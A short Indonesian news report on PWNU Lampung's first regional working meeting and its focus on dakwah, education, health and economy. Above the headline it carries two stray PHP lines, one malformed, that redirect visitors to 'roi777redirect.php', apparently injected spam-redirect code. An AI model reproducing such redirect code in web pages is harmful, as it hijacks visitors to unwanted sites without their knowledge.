header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Gelar Mukerwil I PWNU Lampung Mantapkan Kerja, Kerja, Kerja -
Gelar Mukerwil I PWNU Lampung Mantapkan Kerja, Kerja, Kerja

TRANSLAMPUNG.COM, BANDARLAMPUNG – Pengurus Wilayah Nadhlatul Ulama (PWNU) Lampung menggelar Musyawarah Kerja Wilayah (Mukerwil) I PCNU Se-provinsi Lampung Masa Khidmat 2018-2023.

Sekretaris Panitia kegiatan Mukerwil PWNU Lampung Safari Daud mengatakan Mukerwil I PWNU Lampung mengambil tema “Transformasi kerja kata menjadi kerja nyata”.

“Mukerwil ini menjadi sebuah momentum untuk meng-konkritkan hal-hal yang menjadi fokus utama dalam program wilayah yaitu bidang Dakwah, pendidikan, kesehatan, dan Ekonomi” kata Safari Daud dalam sambutannya di Asrama Haji, Rajabasa, minggu (1/7).

Sementara Moh. Mukri, Ketua PWNU Lampung menjelaskan Mukerwil sudah diagendakan sejak lama dan waktunya ditentukan berbarengan dengan Silahturahmi Nasional (Silatnas) se-Indonesia, Senin esok (2/7).

“Silatnas insyaallah akan dihadiri Ketua Umum PBNU KH. Said Aqil Siroj besok di Hotel Novotel untuk bersilaturahmi sekaligus membincangkan persoalan strategis untuk menghadapi tahun 2019,” kata rektor UIN Raden Intan Lampung dalam sambutannya.

Dia berharap Mukerwil yang akan diadakan selama dua hari di Asrama Haji, Rajabasa ini bukan hanya menghasilkan dalam bentuk narasi dan kata-kata saja, namun melalui Mukerwil program-program kerja dapat membawa perubahan NU berjaya, bermartabat dan berada.

“Bahwa bangsa ini sangat mengharapkan kehadiran NU, bahwa program kita setidaknya difokuskan kepada empat hal yakni dakwah, penguatan pendidikan, kesehatan dan ekonomi. Saat ini bahkan banyak Santri NU yang mengikuti kontelasi Pilkada 2018 dan menang, ini suatu kebanggaan dan semoga dapat menghasilkan kerja nyata yang bisa dilihat mata, disentuh dan dirasakan,” kata dia. (Davit)

News Reporter